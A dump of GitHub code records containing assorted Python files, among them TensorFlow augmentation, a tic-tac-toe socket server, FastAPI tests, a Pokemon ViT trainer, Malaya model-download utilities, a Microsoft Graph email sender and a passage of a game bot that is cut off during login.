return image\n\n with tf.name_scope('random_pixel_value_scale'):\n do_it = tf.less(tf.random_uniform([]), probability)\n image = tf.cond(do_it, lambda: random_value_scale(image), lambda: image)\n return image\n\n\ndef random_jitter_boxes(boxes, ratio=0.05):\n \"\"\"Randomly jitter bounding boxes.\n\n Arguments:\n boxes: a float tensor with shape [N, 4].\n ratio: a float number.\n The ratio of the box width and height that the corners can jitter.\n For example if the width is 100 pixels and ratio is 0.05,\n the corners can jitter up to 5 pixels in the x direction.\n Returns:\n a float tensor with shape [N, 4].\n \"\"\"\n def random_jitter_box(box, ratio):\n \"\"\"Randomly jitter a box.\n Arguments:\n box: a float tensor with shape [4].\n ratio: a float number.\n Returns:\n a float tensor with shape [4].\n \"\"\"\n ymin, xmin, ymax, xmax = [box[i] for i in range(4)]\n box_height, box_width = ymax - ymin, xmax - xmin\n hw_coefs = tf.stack([box_height, box_width, box_height, box_width])\n\n rand_numbers = tf.random_uniform(\n [4], minval=-ratio, maxval=ratio, dtype=tf.float32\n )\n hw_rand_coefs = tf.multiply(hw_coefs, rand_numbers)\n\n jittered_box = tf.add(box, hw_rand_coefs)\n return jittered_box\n\n with tf.name_scope('random_jitter_boxes'):\n distorted_boxes = tf.map_fn(\n lambda x: random_jitter_box(x, ratio),\n boxes, dtype=tf.float32, back_prop=False\n )\n distorted_boxes = tf.clip_by_value(distorted_boxes, 0.0, 1.0)\n return distorted_boxes\n","repo_name":"TropComplique/FaceBoxes-tensorflow","sub_path":"src/input_pipeline/other_augmentations.py","file_name":"other_augmentations.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"6"} +{"seq_id":"73568932348","text":"from time import sleep\nimport socket as s\nimport threading\n\nsocket = None\njugadores = []\nnombres = []\n\ndef start():\n global socket\n socket = s.socket(s.AF_INET, s.SOCK_STREAM)\n socket.bind(('', 9000))\n socket.listen(3) \n threading.Thread(target=handle_client, args=(socket,)).start()\n\ndef handle_client(sckt):\n while True:\n if len(jugadores) < 2:\n client, addr = sckt.accept()\n jugadores.append(client)\n threading.Thread(\n target=send_recv_data, \n args=(client, addr)\n ).start()\n\ndef send_recv_data(client_connection, client_ip_addr):\n global socket, jugadores\n client_name = client_connection.recv(4096)\n\n client_connection.send('player1' if len(jugadores) < 2 else 'player2')\n nombres.append(client_name)\n\n if len(jugadores) > 1:\n sleep(1)\n jugadores[0].send('opponent_name~' + str(nombres[1]) + 'pieceO')\n jugadores[1].send('opponent_name~' + str(nombres[0]) + 'pieceX')\n\n\n while True:\n data = client_connection.recv(4096)\n if not data: break\n\n if data.startswith(\"~xy~\"):\n # mandar info a jugador 1 o 2, depende quien haya mandado primero\n jugadores[1 if client_connection == jugadores[0] else 0].send(data)\n\n client_connection.close()\n\nif __name__ == \"__main__\":\n i = 0\n while True:\n if i == 0:\n i += 1\n start()\n else: \n pass","repo_name":"gabrielurenah/tic-tac-toe","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24017819894","text":"from typing import Optional\n\nimport pytest\nfrom fastapi import Depends, FastAPI\nfrom fastapi.testclient import TestClient\nfrom fastapi_qp import QueryParam\nfrom pydantic import Field, ValidationError\nfrom pydantic.error_wrappers import ValidationError\nfrom pydantic.main import BaseModel\n\n\nclass DateParams(BaseModel, QueryParam):\n since: Optional[str] = Field(\n None, \n description=\"A date in the format YYYY-MM-DD\",\n min_length=10,\n max_length=10,\n regex=\"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\",\n )\n until: Optional[str] = Field(\n None, \n description=\"A date in the format YYYY-MM-DD\",\n min_length=10,\n max_length=10,\n regex=\"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\"\n )\n\nclass PaginationParams(BaseModel, QueryParam):\n offset: int = Field(\n 0, \n description=\"Items ignored from the beginning of the list\",\n gte=0,\n )\n limit: int = Field(\n 100, \n description=\"Number of items per result\",\n ge=0,\n le=1000\n )\n\nclass CommonParams(PaginationParams, DateParams):\n pass\n\napp = FastAPI()\n\n@app.get(\"/\")\nasync def read(params: CommonParams = Depends(CommonParams.params())):\n return params.dict()\n\nclient = TestClient(app)\n\ndef test_no_params():\n response = client.get(\"/\")\n assert response.json()['since'] == None\n\ndef test_single_param():\n response = client.get(\"/\" + CommonParams(since='2020-01-01').to_url())\n assert response.json()['since'] == '2020-01-01'\n\ndef test_multiple_params():\n response = client.get(\"/\" + CommonParams(since='2020-01-01', limit=50).to_url())\n assert response.json()['since'] == '2020-01-01'\n assert response.json()['limit'] == 50\n\ndef test_invalid_param():\n with pytest.raises(ValidationError):\n client.get(\"/\" + CommonParams(limit=1001).to_url())\n\ndef test_no_param_url():\n assert CommonParams().to_url() == None\n","repo_name":"clicampo/fastapi-qp","sub_path":"test/test_qp.py","file_name":"test_qp.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"6"} +{"seq_id":"26203947926","text":"from spillbrett import Spillbrett\r\n \r\ndef hovedprogram():\r\n #Bruker kan bestemme størrelse på brettet\r\n brettStorrelse = input(\"Hvor mange stort skal brettet være? (eks: '10 10' gir et brett på 10x10 ruter) \").split()\r\n\r\n #Gjør tester for at brukerinput er logisk (todimensjonalt brett / mindre enn 30 * 30-brett)\r\n if len(brettStorrelse) > 2 or int(brettStorrelse[0]) > 30 and int(brettStorrelse[1]) > 30 or int(brettStorrelse[0]) < 3 or int(brettStorrelse[1]) < 3:\r\n print(\"Ugyldig input\")\r\n \r\n else:\r\n #Dersom brukerinput er lovlig lages et nytt brett\r\n nyttSpill = Spillbrett(brettStorrelse[0], brettStorrelse[1])\r\n\r\n nesteGen = True\r\n \r\n #Sjekker videre dirigering av bruker (q for å avslutte / enter for å fortsette)\r\n while nesteGen:\r\n \r\n #Tegner opp brettet\r\n nyttSpill.tegnBrett()\r\n #Får inn brukerinput\r\n nyGen = input(\"\\nTrykk 'Enter' å gå til neste generasjon eller 'Q' for å avslutte \").lower()\r\n\r\n #Avslutter programmet dersom bruker taster inn 'q' eller alle cellene er døde\r\n if nyGen == \"q\" or nyttSpill.antallLevendeCeller() == 0:\r\n print(\"Program avsluttes...\")\r\n nesteGen = False\r\n else:\r\n nyttSpill.oppdatering()\r\n\r\n\r\nhovedprogram()","repo_name":"JohaBju/python","sub_path":"cellespill/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7080708223","text":"import os\nimport torch\nfrom PIL import Image\n\n# For loading pre-train model\nimport pytorch_lightning as pl\nfrom transformers import ViTForImageClassification\nfrom transformers.optimization import AdamW\nfrom torch.utils.data import random_split\n\n# For dataloading\nfrom math import floor\nfrom torch import manual_seed\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\n# For loggin loss, acc, ckpt\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n# Training Data transformation\npokemon_train_transforms = transforms.Compose(\n [\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n ]\n)\n\nclass PokemonClassifier(pl.LightningModule):\n def __init__(self):\n super().__init__()\n # Pretrain Model\n model_name = \"google/vit-base-patch16-224\"\n self.model = ViTForImageClassification.from_pretrained(model_name)\n self.model.num_labels = 150 # number of pokemon classes\n self.model.classifier = torch.nn.Linear(768, self.model.num_labels)\n # Hyper-parameters\n self.batch_size = 16\n self.lr = 5e-5\n # Data roots\n self.data_root = \"C:/study/ee576/project/data/PokemonData\"\n self.ckpt_dir = \"C:/study/ee576/project/ee576-cv-vit/models/logs/pokemon/version_4/checkpoints\"\n\n def prepare_data(self):\n manual_seed(80)\n dataset = ImageFolder(self.data_root, pokemon_train_transforms)\n val_size = floor((len(dataset)) * 0.10) # train:val -> 90:10\n train_size = len(dataset) - val_size\n self.train_ds, self.test_ds = random_split(dataset, [train_size, val_size])\n\n def configure_optimizers(self): # used by pytorch-lightning\n return AdamW(self.parameters(), lr=self.lr, weight_decay=0.01)\n\n def forward(self, batch, batch_idx):\n return self.model(batch[0].squeeze(), labels=batch[1].squeeze())\n\n def training_step(self, batch, batch_idx):\n loss = self(batch, batch_idx)[0]\n self.log(\"train_loss: \", loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n output = self(batch, batch_idx) # loss, pred_id\n loss = output[0]\n pred_labels = output[1].argmax(-1)\n gt_labels = batch[1].squeeze()\n accuracy = torch.sum(pred_labels == gt_labels) / self.batch_size\n self.log(\"val_accuracy: \", accuracy)\n self.log(\"val_loss: \", loss)\n\n def train_dataloader(self):\n return DataLoader(\n self.train_ds, self.batch_size, shuffle=True, num_workers=2, pin_memory=True\n )\n\n def val_dataloader(self):\n return DataLoader(self.test_ds, self.batch_size, num_workers=2, pin_memory=True)\n\n\n### Fine-Tune(Train) Pokemon Classifier ###\nif __name__ == \"__main__\":\n PokeModel = PokemonClassifier()\n logger = TensorBoardLogger(\"logs\", name=\"pokemon\")\n trainer = pl.Trainer(\n accumulate_grad_batches=4,\n default_root_dir=\"logs\",\n accelerator=\"gpu\",\n devices=\"auto\",\n max_epochs=5,\n check_val_every_n_epoch=1,\n logger=logger,\n )\n trainer.fit(PokeModel)\n","repo_name":"christinewoo/ee576-cv-vit","sub_path":"models/vit_pokemon.py","file_name":"vit_pokemon.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24470856201","text":"import tensorflow as tf\nimport inspect\nimport numpy as np\nimport requests\nimport os\nimport logging\nfrom tqdm import tqdm\nfrom pathlib import Path\nfrom datetime import datetime\nfrom malaya import home, _delete_folder, gpu_available, __gpu__\n\nURL = 'https://f000.backblazeb2.com/file/malaya-model/'\n\n\ndef check_tf_version():\n version = tf.__version__\n return int(version.split('.')[0])\n\n\nif check_tf_version() > 1:\n import warnings\n\n warnings.warn(\n 'Cannot import beam_search_ops not available for Tensorflow 2, `deep_model` for stemmer will not available to use.'\n )\n\nelse:\n try:\n from tensorflow.contrib.seq2seq.python.ops import beam_search_ops\n except:\n import warnings\n\n warnings.warn(\n 'Cannot import beam_search_ops from tensorflow, `deep_model` for stemmer will not available to use, make sure Tensorflow 1 version >= 1.15'\n )\n\n\ndef download_file_cloud(url, filename):\n if 'http' not in url:\n url = URL + url\n r = requests.get(url, stream = True)\n total_size = int(r.headers['content-length'])\n version = int(r.headers.get('X-Bz-Upload-Timestamp', 0))\n os.makedirs(os.path.dirname(filename), exist_ok = True)\n with open(filename, 'wb') as f:\n for data in tqdm(\n iterable = r.iter_content(chunk_size = 1_048_576),\n total = total_size / 1_048_576,\n unit = 'MB',\n unit_scale = True,\n ):\n f.write(data)\n return version\n\n\ndef check_file_cloud(url):\n url = URL + url\n r = requests.head(url)\n exist = r.status_code == 200\n if exist:\n version = int(r.headers.get('X-Bz-Upload-Timestamp', 0))\n else:\n version = 0\n return exist, version\n\n\ndef check_files_local(file):\n for key, item in file.items():\n if 'version' in key:\n continue\n if not os.path.isfile(item):\n return False\n return True\n\n\ndef nodes_session(graph, inputs, outputs, extra = None, attention = None):\n input_nodes = {i: graph.get_tensor_by_name(f'import/{i}:0') for i in inputs}\n output_nodes = {\n o: graph.get_tensor_by_name(f'import/{o}:0') for o in outputs\n }\n if extra:\n extra = {k: graph.get_tensor_by_name(v) for k, v in extra.items()}\n output_nodes = {**output_nodes, **extra}\n if attention:\n output_nodes = {**output_nodes, **attention}\n return input_nodes, output_nodes\n\n\ndef generate_session(graph, **kwargs):\n config = tf.compat.v1.ConfigProto()\n if gpu_available():\n if 'gpu' in kwargs:\n config.allow_soft_placement = True\n\n if 'gpu_limit' in kwargs:\n try:\n gpu_limit = float(kwargs.get('gpu_limit', 0.999))\n except:\n raise ValueError('gpu_limit must be a float')\n if not 0 < gpu_limit < 1:\n raise ValueError('gpu_limit must 0 < gpu_limit < 1')\n\n config.gpu_options.per_process_gpu_memory_fraction = gpu_limit\n config.gpu_options.allow_growth = True\n\n sess = tf.compat.v1.Session(config = config, graph = graph)\n return sess\n\n\ndef get_device(**kwargs):\n device = 'CPU'\n no = 0\n if gpu_available():\n if 'gpu' in kwargs:\n gpu = kwargs.get('gpu', 0)\n if not isinstance(gpu, int):\n raise ValueError('gpu must an int')\n if not 0 <= gpu < len(__gpu__):\n raise ValueError(f'gpu must 0 <= gpu < {len(__gpu__)}')\n no = gpu\n device = 'GPU'\n return f'/device:{device}:{no}'\n\n\ndef load_graph(frozen_graph_filename, **kwargs):\n with tf.io.gfile.GFile(frozen_graph_filename, 'rb') as f:\n try:\n graph_def = tf.compat.v1.GraphDef()\n graph_def.ParseFromString(f.read())\n except Exception as e:\n path = frozen_graph_filename.split('Malaya/')[1]\n path = '/'.join(path.split('/')[:-1])\n raise Exception(\n f\"{e}, file corrupted due to some reasons, please run `malaya.clear_cache('{path}')` and try again\"\n )\n\n # https://github.com/onnx/tensorflow-onnx/issues/77#issuecomment-445066091\n # to fix import T5\n for node in graph_def.node:\n if node.op == 'RefSwitch':\n node.op = 'Switch'\n for index in xrange(len(node.input)):\n if 'moving_' in node.input[index]:\n node.input[index] = node.input[index] + '/read'\n elif node.op == 'AssignSub':\n node.op = 'Sub'\n if 'use_locking' in node.attr:\n del node.attr['use_locking']\n elif node.op == 'AssignAdd':\n node.op = 'Add'\n if 'use_locking' in node.attr:\n del node.attr['use_locking']\n elif node.op == 'Assign':\n node.op = 'Identity'\n if 'use_locking' in node.attr:\n del node.attr['use_locking']\n if 'validate_shape' in node.attr:\n del node.attr['validate_shape']\n if len(node.input) == 2:\n node.input[0] = node.input[1]\n del node.input[1]\n\n device = get_device(**kwargs)\n\n with tf.Graph().as_default() as graph:\n with tf.device(device):\n tf.import_graph_def(graph_def)\n return graph\n\n\ndef download_from_dict(file, s3_file, validate = True, quantized = False):\n if quantized:\n if 'quantized' not in file:\n f = file.replace(home, '').split('/')\n raise Exception(\n f'Quantized model for {f[1].upper()} module is not available, please load normal model.'\n )\n model = 'quantized'\n logging.warning('Load quantized model will cause accuracy drop.')\n else:\n model = 'model'\n if validate:\n base_location = os.path.dirname(file[model])\n version = os.path.join(base_location, 'version')\n download = False\n if os.path.isfile(version):\n with open(version) as fopen:\n if not file['version'] in fopen.read():\n print(f'Found old version of {base_location}, deleting..')\n _delete_folder(base_location)\n print('Done.')\n download = True\n else:\n for key, item in file.items():\n if not os.path.exists(item):\n download = True\n break\n else:\n download = True\n\n if download:\n for key, item in file.items():\n if 'version' in key:\n continue\n if model == 'quantized' and key == 'model':\n continue\n if model == 'model' and key == 'quantized':\n continue\n if not os.path.isfile(item):\n print(f'downloading frozen {key} to {item}')\n download_file_cloud(s3_file[key], item)\n with open(version, 'w') as fopen:\n fopen.write(file['version'])\n else:\n if not check_files_local(file):\n path = '/'.join(file[model].split('/')[:-1])\n raise Exception(\n f'{path} is not available, please `validate = True`'\n )\n\n\ndef download_from_string(\n path, module, keys, validate = True, quantized = False\n):\n model = path\n keys = keys.copy()\n keys['version'] = 'version'\n\n if quantized:\n path = os.path.join(module, f'{path}-quantized')\n quantized_path = os.path.join(path, 'model.pb')\n if not check_file_cloud(quantized_path)[0]:\n f = quantized_path.replace(home, '').split('/')\n raise Exception(\n f'Quantized model for `{os.path.join(module, model)}` is not available, please load normal model.'\n )\n logging.warning('Load quantized model will cause accuracy drop.')\n else:\n path = os.path.join(module, path)\n path_local = os.path.join(home, path)\n files_local = {'version': os.path.join(path_local, 'version')}\n files_cloud = {}\n for key, value in keys.items():\n # if absolute path, means, shared file in cloud, but duplicated for each models\n if '/' in value:\n f_local = os.path.join(path_local, value.split('/')[-1])\n f_cloud = value\n # combine using `module` parameter\n else:\n f_local = os.path.join(path_local, value)\n f_cloud = os.path.join(path, value)\n files_local[key] = f_local\n files_cloud[key] = f_cloud\n if validate:\n download = False\n version = files_local['version']\n latest = str(\n max(\n [check_file_cloud(item)[1] for key, item in files_cloud.items()]\n )\n )\n if os.path.isfile(version):\n with open(version) as fopen:\n if not latest in fopen.read():\n p = os.path.dirname(version)\n print(f'Found old version in {p}, deleting..')\n _delete_folder(p)\n print('Done.')\n download = True\n else:\n for key, item in files_local.items():\n if not os.path.exists(item):\n download = True\n break\n else:\n download = True\n\n if download:\n versions = []\n for key, item in files_local.items():\n if 'version' in key:\n continue\n if not os.path.isfile(item):\n print(f'downloading frozen {key} to {item}')\n versions.append(download_file_cloud(files_cloud[key], item))\n latest = str(max(versions))\n with open(version, 'w') as fopen:\n fopen.write(latest)\n\n else:\n if not check_files_local(files_local):\n path = '/'.join(files_local['model'].split('/')[:-1])\n raise Exception(\n f'{path} is not available, please `validate = True`'\n )\n return files_local\n\n\ndef check_file(\n file,\n s3_file = None,\n module = None,\n keys = None,\n validate = True,\n quantized = False,\n **kwargs,\n):\n if isinstance(file, dict) and isinstance(s3_file, dict):\n download_from_dict(\n file = file,\n s3_file = s3_file,\n validate = validate,\n quantized = quantized,\n )\n else:\n file = download_from_string(\n path = file,\n module = module,\n keys = keys,\n validate = validate,\n quantized = quantized,\n )\n return file\n\n\nclass DisplayablePath(object):\n display_filename_prefix_middle = '├──'\n display_filename_prefix_last = '└──'\n display_parent_prefix_middle = ' '\n display_parent_prefix_last = '│ '\n\n def __init__(self, path, parent_path, is_last):\n self.path = Path(str(path))\n self.parent = parent_path\n self.is_last = is_last\n if self.parent:\n self.depth = self.parent.depth + 1\n else:\n self.depth = 0\n\n @property\n def displayname(self):\n if self.path.is_dir():\n return self.path.name + '/'\n return self.path.name\n\n @classmethod\n def make_tree(cls, root, parent = None, is_last = False, criteria = None):\n root = Path(str(root))\n criteria = criteria or cls._default_criteria\n displayable_root = cls(root, parent, is_last)\n yield displayable_root\n\n children = sorted(\n list(path for path in root.iterdir() if criteria(path)),\n key = lambda s: str(s).lower(),\n )\n count = 1\n for path in children:\n is_last = count == len(children)\n if path.is_dir():\n yield from cls.make_tree(\n path,\n parent = displayable_root,\n is_last = is_last,\n criteria = criteria,\n )\n else:\n yield cls(path, displayable_root, is_last)\n count += 1\n\n @classmethod\n def _default_criteria(cls, path):\n return True\n\n @property\n def displayname(self):\n if self.path.is_dir():\n return self.path.name + '/'\n return self.path.name\n\n def displayable(self):\n if self.parent is None:\n return self.displayname\n\n _filename_prefix = (\n self.display_filename_prefix_last\n if self.is_last\n else self.display_filename_prefix_middle\n )\n\n parts = ['{!s} {!s}'.format(_filename_prefix, self.displayname)]\n\n parent = self.parent\n while parent and parent.parent is not None:\n parts.append(\n self.display_parent_prefix_middle\n if parent.is_last\n else self.display_parent_prefix_last\n )\n parent = parent.parent\n\n return ''.join(reversed(parts))\n\n\ndef add_neutral(x, alpha = 1e-2):\n x = x.copy()\n divide = 1 / x.shape[1]\n x_minus = np.maximum(x - divide, alpha * x)\n x_divide = x_minus / divide\n sum_axis = x_divide.sum(axis = 1, keepdims = True)\n return np.concatenate([x_divide, 1 - sum_axis], axis = 1)\n\n\ndef describe_availability(dict, transpose = True, text = ''):\n if len(text):\n import logging\n\n logging.basicConfig(level = logging.INFO)\n\n logging.info(text)\n try:\n import pandas as pd\n\n df = pd.DataFrame(dict)\n\n if transpose:\n return df.T\n else:\n return df\n except:\n return dict\n\n\nfrom . import validator\n","repo_name":"MuzyAce/malaya","sub_path":"malaya/function/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"31970635305","text":"import requests\nimport json\nfrom os import system\nfrom apiCalls.apiChooseUser import pickUser\nfrom apiCalls.apiChooseUser import openTokenLibrary\n\n\n#------------Here is where you create a template email--------------------------\ndef templateEmail():\n\n recipient = input('To: ')\n \n data={\n \"message\": {\n\n #Enter subject (str)\n #\"subject\": '[subject]',\n \"subject\": 'Test Template Email',\n \"body\": {\n \"contentType\": \"Text\",\n\n #Enter Body (str)\n #\"content\": '[body]'\n \"content\": 'Test of the template email.'\n },\n \"toRecipients\": [\n {\n \"emailAddress\": {\n #Enter Recipient (str)\n #\"address\": '[recipient]'\n \"address\": recipient\n }\n }\n ],\n \n },\n \"saveToSentItems\": \"false\"\n }\n \n return data\n\n#---------------------------------Create New Email-----------------------------------------------\ndef createEmail():\n\n data=''\n #email components\n while True:\n system('clear')\n recipient = input('To Address: ')\n if recipient == 'q':\n break\n\n subject = input('Subject: ')\n if subject == 'q':\n break\n\n body = input('Body: ')\n if body == 'q':\n break\n\n system('clear')\n\n print('Confirmation:\\n')\n print(f'To: {recipient}')\n print(f'Subject: {subject}')\n print(f'Body: {body}')\n\n response = input('\\nIs everything correct? y/n/q: ')\n\n if response == 'y':\n\n data={\n \"message\": {\n \"subject\": subject,\n \"body\": {\n \"contentType\": \"Text\",\n \"content\": body\n },\n \"toRecipients\": [\n {\n \"emailAddress\": {\n \"address\": recipient\n }\n }\n ],\n \n },\n \"saveToSentItems\": \"false\"\n }\n \n break\n \n \n\n elif response == 'n':\n system('clear')\n continue\n\n elif response == 'q':\n system('clear')\n break\n \n return data\n#-----------------Main------------------------------------\ndef sendQuery(user):\n data=''\n system('clear')\n\n while True:\n isCustom = input('New or template email? n/t: ')\n \n if isCustom == 'n':\n data = createEmail()\n break\n\n elif isCustom == 'q':\n return\n \n elif isCustom == 't':\n data = templateEmail()\n while True:\n \n sendTemplateEmail = input('Confirm send? y/n: ')\n\n if sendTemplateEmail == 'y':\n break\n if sendTemplateEmail == 'n':\n data == None\n return data\n elif sendTemplateEmail != 'y' or sendTemplateEmail != 'n':\n print('[-] Invalid input\\n')\n continue\n break\n\n else:\n print('[-] Invalid input')\n continue\n \n if data == None:\n return\n \n else:\n\n #get user and token\n tokenLibrary = openTokenLibrary()\n\n #make and send query\n headers={'Authorization': 'Bearer ' + tokenLibrary[user]['access_token'], 'Content-type': 'application/json'}\n\n #send API request to send email\n graph_data = requests.post('https://graph.microsoft.com/v1.0/me/sendMail', json=data, headers=headers)\n\n if str(graph_data) == '':\n print('[+] Email Sent Successfully\\n')\n \n else:\n print(graph_data.text)\n \n input('Press ENTER to continue...')","repo_name":"Synzack/PynAuth","sub_path":"apiCalls/apiSendMail.py","file_name":"apiSendMail.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"3946823360","text":"import shared\n\n\ndef linq54():\n doubles = [1.7, 2.3, 1.9, 4.1, 2.9]\n \n sorted_doubles = sorted(doubles, reverse=True)\n\n doubles_array = list(sorted_doubles)\n \n print(\"Every other double from highest to lowest:\")\n d = 0\n while d < len(doubles_array):\n print(doubles_array[d])\n d += 2\n\n\ndef linq55():\n words = [\"cherry\", \"apple\", \"blueberry\"]\n\n sorted_words = sorted(words)\n\n word_list = list(sorted_words)\n\n print(\"The sorted word list:\")\n shared.printN(word_list)\n\n\ndef linq56():\n score_records = [{'Name': \"Alice\", 'Score': 50},\n {'Name': \"Bob\", 'Score': 40},\n {'Name': \"Cathy\", 'Score': 45}]\n\n score_records_dict = {s['Name']:s['Score'] for s in score_records}\n\n print(\"Bob's score: %s\" % score_records_dict[\"Bob\"])\n\n\ndef linq57():\n numbers = [None, 1.0, \"two\", 3, \"four\", 5, \"six\", 7.0]\n\n floats = (n for n in numbers if isinstance(n, float))\n\n print(\"Numbers stored as floats:\")\n shared.printN(floats)\n\n\nlinq54()\n# linq55()\n# linq56()\n# linq57()\n","repo_name":"rogerwcpt/python-linq-samples","sub_path":"src/python/linq-conversion.py","file_name":"linq-conversion.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"6"} +{"seq_id":"44676269386","text":"from __future__ import annotations\nfrom typing import (\n List,\n Optional,\n Tuple,\n Type,\n TypeVar,\n)\n\nimport logging\nimport time\nimport traceback\n\nimport dbot.network.events as events\nfrom dbot.network.retrosocket import RetroSocket\n\nfrom dbot.state.party import Party\nfrom dbot.state.state import GameState\nfrom dbot.state.uistate import UIState\n\nfrom dbot.chat_commands import CommandHandler\n\nfrom dbot.battle.battle import Battle\nfrom dbot.battle.battle_controller import (\n BattleController,\n SimpleClericController,\n)\n\nfrom dbot.actions.action import Action\nfrom dbot.actions.map_action import MapAction\nfrom dbot.actions.party_action import PartyAction\nfrom dbot.actions.grind_action import (\n GrindAction,\n GrindTarget,\n)\n\nfrom dbot.config import BotConfig\nfrom dbot.common.type_help import *\nfrom dbot.movement.pathfinding import Point\nfrom dbot.movement.movement import MovementController\nfrom dbot.common.common import (\n Direction,\n Player,\n UIPositions,\n)\n\n\nclass BotCore:\n \"\"\" The bare essentials of a bot\n\n All of the necessaru game state, socket setup, event loop, etc\n are created, but has no real in-game functionality.\n \"\"\"\n\n def __init__(\n self,\n config: BotConfig,\n ) -> None:\n self.config = config\n self.name = config.name\n self.admins = config.admins\n self.friends = config.friends\n\n # network\n self._socket: Optional[RetroSocket] = None\n self.logging_out = False\n\n # gamestate\n self.battle: Optional[Battle] = None\n self.party = Party(self, [self.name])\n self.state = GameState()\n self.ui = UIState()\n\n # controllers\n self.battler : BattleController = SimpleClericController(self)\n self.mover = MovementController(self)\n\n #\n # network properties\n #\n\n @property\n def socket(self) -> RetroSocket:\n if self._socket is not None:\n return self._socket\n raise RuntimeError('not connected')\n\n #\n # convenience properties\n #\n\n @property\n def me(self) -> Player:\n p = self.state.get_player(self.name)\n assert p is not None\n return p\n\n @property\n def position(self) -> Point:\n return (\n int(self.me['coords']['x']),\n int(self.me['coords']['y']),\n )\n\n @property\n def logged_in_friends(self) -> List[str]:\n logged_in: List[str] = []\n for friend in self.friends:\n assert friend != self.name\n if friend in self.state.players:\n logged_in.append(friend)\n return list(sorted(logged_in))\n\n @property\n def logged_in_bots(self) -> List[str]:\n return list(sorted(\n [self.name] + self.logged_in_friends\n ))\n\n @property\n def is_bot_leader(self) -> bool:\n return self.logged_in_bots[0] == self.name\n\n @property\n def is_in_battle(self) -> bool:\n return self.battle is not None\n\n #\n # main loop\n #\n\n def run_forever(self) -> None:\n\n n_errors = 0\n last_action = 0.0\n loop_timeout = 0.2\n action_timeout = 0.5\n\n with RetroSocket() as s:\n self._socket = s\n try:\n while not self.logging_out:\n now = time.time()\n do_action = (now - last_action) > action_timeout\n self.do_step(do_action)\n if do_action:\n last_action = now\n time.sleep(loop_timeout)\n except KeyboardInterrupt as e:\n s.send_logout()\n time.sleep(1)\n return\n except Exception as e:\n n_errors += 1\n if n_errors > self.config.max_errors:\n logging.error('hit max errors')\n raise e\n else:\n self.warn_exception(e)\n finally:\n self._socket = None\n\n def do_step(\n self,\n do_actions: bool,\n ) -> None:\n while not self.socket.event_queue.empty():\n # handle all new events\n event = self.socket.event_queue.get()\n self.handle_event(event)\n\n if do_actions:\n # then do any actions\n if self.is_in_battle:\n self.battler.step()\n else:\n self.mover.step()\n self.step()\n\n def step(self) -> None:\n # To be implemented by bots\n ...\n\n def handle_event(\n self,\n event: events.GameEvent,\n ) -> None:\n handler_name = f'on_{event.event_name}'\n self.dispatch_handlers(handler_name, event)\n\n def dispatch_handlers(\n self,\n handler_name: str,\n *args,\n ) -> None:\n # always call ui handlers\n self.call_handler(self.ui, handler_name, *args)\n\n # call either battle or movement events\n if self.is_in_battle:\n self.call_handler(self.battler, handler_name, *args)\n else:\n self.call_handler(self.mover, handler_name, *args)\n\n # finally check bot handlers\n self.call_handler(self, handler_name, *args)\n\n def call_handler(\n self,\n obj: object,\n handler_name,\n *args,\n ) -> None:\n handler = getattr(obj, handler_name, None)\n backup = getattr(obj, 'catch_all_handler', None)\n if handler is not None:\n handler(*args)\n elif backup is not None:\n backup(*args)\n\n #\n # logging\n #\n\n def warn_exception(\n self,\n e: Exception,\n ) -> None:\n logging.warning('\\n'.join([\n '--- exception in dbot ---',\n traceback.format_exc(),\n '-------------------------',\n ]))\n\n\nclass BasicBot(BotCore):\n \"\"\" A simple bot that can respond to commands\n\n GameEvent handlers to keep game state in sync along with\n basic chat command functionality and action queue.\n \"\"\"\n\n def __init__(\n self,\n *args,\n **kwargs,\n ) -> None:\n super().__init__(*args, **kwargs)\n\n # actions\n self.commands = CommandHandler(self, config.command_prompt)\n self.commands.add_default_commands()\n self.action_queue: List[Action] = []\n\n\n # TODO: put this somewhere?\n self.report_channel = 'wsay'\n self.report_state = 'none'\n self.stopped_at_leave_map = False\n\n def step(self) -> None:\n if self.current_action is not None:\n complete = self.current_action.step()\n if complete:\n self.current_action.cleanup()\n self.action_queue.pop(0)\n\n #\n # commands and actions\n #\n\n @property\n def current_action(self) -> Optional[Action]:\n if len(self.action_queue) > 0:\n return self.action_queue[0]\n return None\n\n def enqueue_action(\n self,\n action: Action,\n ) -> None:\n self.action_queue.append(action)\n\n def clear_actions(self) -> None:\n if self.current_action is not None:\n self.current_action.cleanup()\n self.action_queue = []\n\n #\n # game state update handlers\n #\n\n def on_update(\n self,\n e: events.Update,\n ) -> None:\n \"\"\" core client state updates, passed on to onchange_* methods \"\"\"\n self.state.vars[e.key] = e.value\n handler_name = f'onupdate_{e.key}'\n self.dispatch_handlers(handler_name, e.value)\n\n def on_playerUpdate(\n self,\n e: events.PlayerUpdate,\n ) -> None:\n player = self.state.get_player(e.username)\n if player is not None:\n player[e.key] = e.value\n if e.username != self.name:\n self.state.players_in_map.add(e.username)\n else:\n logging.warning(f'missing player moved: {e.username}')\n\n #\n # login flow\n #\n\n def on_connected(\n self,\n e: events.Connected,\n ) -> None:\n logging.info('connected, signing in')\n self.socket.emit('signIn', {\n 'email': self.config.email,\n 'password': 